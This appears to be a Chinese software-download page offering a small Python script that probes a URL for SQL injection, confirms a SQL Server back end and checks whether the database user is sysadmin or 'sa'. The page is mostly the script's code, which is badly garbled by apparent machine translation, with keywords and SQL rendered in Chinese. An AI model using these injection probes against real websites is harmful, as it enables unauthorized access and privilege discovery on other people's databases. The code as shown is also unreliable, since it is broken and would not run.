Python编写数据库救世军(救世军)用户检测方案

类型：编程工具大小：21M语言：英文评分：8.7标签:立即下载无聊的时候，用计算机编程语言写的一个小程序，用有注入点的链接，检测当前数据库用户是否为sa，没什么技术含量。

#CodebyzhaoxiaobuEmail:little.bu@hotmail.com

#-*-coding : utf-8-*-fromsimportexit frourlliimport lopen from string gimport join，strip froreimporttsarch defis _ SQL lable(): SQL 1='和1=2 ' SQL 2='和1=1 ' URL文件1=URL打开(URL SQL 1)URL文件2=URL打开(URL SQL 2)html代码1=URL文件1。read()html代码2=URL文件2。read()如果不是search(判断，html代码1信息]恭喜！这个统一资源定位器是有注入漏洞的！\n "打印"[信息]现在判断数据库是否是SQLServer，请耐心等候.is_SQLServer() else: print'[错误]你确定这个统一资源定位器能用？换个别的试试吧！\n'defis_SQLServer(): sql='并且存在（从系统对象中选择*)'网址文件=网址打开(网址SQL)html代码=网址文件。read()if notsearch(judge，htmlcodes): print'[错误]数据库好像不是数据库的！\n'else: print'[信息]确认是数据库数据库！\n "打印"[信息]开始检测当前数据库用户权限，请耐心等待.'IS _ sysadmin()defis _ sysadmin(): SQL='和1=(选择IS _ SRVROLEMEMBER(' sysadmin ')' URL文件=URL打开(URL SQL)html代码=URL文件。read()if notsearch(judge，htmlcodes): print'[错误]当前数据库用户不具有系统管理员权限！\n'else: print'[信息]当前数据库用户具有系统管理员权限！\n "打印"[信息]检测当前用户是不是SA，请耐心等待.is_sa() defis_sa(): sql='和sa'=(选择system _ user)'；网址文件=网址打开(网址SQL)html代码=网址文件。read()if notsearch(judge，htmlcodes): print'[错误]当前数据库用户不是SA！\n'else: print'[信息]当前数据库用户是SA！print'^o^SQLServer注入利用工具^o^'印刷的电子邮件：利特。bu @ hotmail。com \ n ' print '================================================================URL=raw _ input([信息]请输入一个可能有注入漏洞的链接！\ nurl : ')如果URL==' : print '[错误]提供的统一资源定位器必须具有asp？xxx='这样的格式退出(1)判断=原始输入([信息]请提供一个判断字符串\n .判断字符串：’)如果判断==' : print '[错误]判断字符串不能为空!'出口(1)是_ sqlable()